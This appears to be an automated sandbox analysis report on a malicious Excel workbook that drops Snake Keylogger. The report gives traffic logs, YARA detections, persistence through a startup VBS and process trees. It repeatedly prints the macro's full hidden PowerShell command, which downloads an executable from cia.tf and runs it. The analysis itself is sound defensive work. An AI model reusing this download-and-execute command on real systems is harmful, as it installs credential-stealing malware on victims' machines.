              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 104.21.1.182:443 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.1.182:443

              Networking

              Source: Yara match, File source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE
              Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: global traffic, HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 Host: cia.tf Connection: Keep-Alive
              Source: unknown, HTTPS traffic detected: 104.21.1.182:443 -> 192.168.2.22:49163 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CD0796D.png
              Source: powershell.exe, 00000002.00000002.425832716.000000001C1AB000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global traffic, DNS traffic detected: DNS query: cia.tf
              Source: unknown, Network traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49163

              System Summary

              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR, Matched rule: Detects Snake Keylogger, Author: ditekSHen
              Source: 7qsPAygCOx.xlsx, OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: BA230000.0.dr, OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
              Source: 7qsPAygCOx.xlsx, Stream path 'VBA/ThisWorkbook' : found hex strings
              Source: BA230000.0.dr, Stream path 'VBA/ThisWorkbook' : found hex strings
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe, File dump: svcost.exe.5.dr 293066043
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\tmp7752.exe
              Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe, Memory allocated: 770B0000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\svcost.exe, Memory allocated: 770B0000 page execute and read and write
              Source: 7qsPAygCOx.xlsxOLE, VBA macro line: Private Sub Workbook_Open()
              Source: BA230000.0.drOLE, VBA macro line: Private Sub Workbook_Open()
              Source: 7qsPAygCOx.xlsxOLE indicator, VBA macros: true
              Source: BA230000.0.drOLE indicator, VBA macros: true
              Source: 7qsPAygCOx.xlsxStream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.Shellqa1"hExecF
              Source: BA230000.0.drStream path 'VBA/__SRP_0' : https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -Out*File $TempFile; St*art-Proce*ss $TempFile;,^WScript.ShellQa1"hExecF
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\tmp7752.exe 13CB2135790780947BE355C3C9ED42BE1987C9E64D6CD0C43A5A4C5AE289DC30
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp7752.exe.3825570.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.519583396.000000000361A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.515916889.00000000026ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.491454590.0000000003821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: tmp7752.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: svcost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 5.2.tmp7752.exe.3825570.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/14@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$7qsPAygCOx.xlsx
              Source: C:\Users\user\AppData\Roaming\svcost.exe Mutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC927.tmp
              Source: 7qsPAygCOx.xlsx OLE indicator, Workbook stream: true
              Source: BA230000.0.dr OLE indicator, Workbook stream: true
              Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
              Source: 7qsPAygCOx.xlsxReversingLabs: Detection: 47%
              Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\tmp7752.exe "C:\Users\user\AppData\Local\Temp\tmp7752.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, amsi.dll, msisip.dll, secur32.dll, rpcrtremote.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, bcrypt.dll, rasapi32.dll, rasman.dll, rtutils.dll, winhttp.dll, webio.dll, credssp.dll, rasadhlp.dll, ncrypt.dll, gpapi.dll, propsys.dll, ntmarta.dll, apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Section loaded: wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, amsi.dll, cryptsp.dll, bcrypt.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, sxs.dll, dwmapi.dll, cryptsp.dll, msisip.dll, mpr.dll, scrrun.dll, propsys.dll, ntmarta.dll, apphelp.dll, secur32.dll
              Source: C:\Users\user\AppData\Roaming\svcost.exe Section loaded: wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, amsi.dll, cryptsp.dll, bcrypt.dll
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: 7qsPAygCOx.xlsx Initial sample: OLE zip file path = xl/media/image1.png
              Source: BA230000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp7752.PDBP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Roaming\svcost.PDBO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbles\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERNAME=Al$$ source: svcost.exe, 00000008.00000002.520082230.0000000005150000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp7752.exe, 00000005.00000002.488982546.0000000000E40000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000395B000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.000000000266B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp7752.exe, 00000005.00000002.488544480.000000000054F000.00000004.00000020.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515284150.0000000000540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp7752.exe, 00000005.00000002.492258851.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.000000000389D000.00000004.00000800.00020000.00000000.sdmp, tmp7752.exe, 00000005.00000002.491454590.0000000003866000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbP source: tmp7752.exe, 00000005.00000002.488510973.0000000000447000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: svcost.exe, 00000008.00000002.515173603.0000000000418000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.390b810.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.395b830.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp7752.exe.e40000.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: Yara matchFile source: 5.2.tmp7752.exe.4a80000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.515916889.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp7752.exe PID: 3756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3928, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00AA189C push 0C418B00h; ret 5_2_00AA18A3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exeCode function: 5_2_00D2E010 push 14418B00h; ret 5_2_00D2E023
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2F15C push 08418B00h; ret 5_2_00D2F163
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2E17C push 0C418B00h; ret 5_2_00D2E183
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D28AB9 push 8C00670Dh; retf 5_2_00D28AC5
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D235F0 push ecx; retf 5_2_00D235F6
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2EEB0 push 0C418B00h; ret 5_2_00D2EEC3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2D670 push 0C418B00h; ret 5_2_00D2D683
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2363B push es; retf 5_2_00D23641
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2D62A push 0C418B00h; ret 5_2_00D2D683
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2DF90 push 14418B00h; ret 5_2_00D2E023
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_00D2EFA0 push 10418B00h; ret 5_2_00D2EFB3
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_050235A6 push edi; retf 5_2_050235AC
              Source: C:\Users\user\AppData\Local\Temp\tmp7752.exe Code function: 5_2_0502271E push edi; retf 5_2_05022740
              Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_0069FA88 pushfd ; retf 8_2_0069FA95
              Source: C:\Users\user\AppData\Roaming\svcost.exe Code function: 8_2_023A8AB9 push 8C00670Dh; retf 8_2_023A8AC5
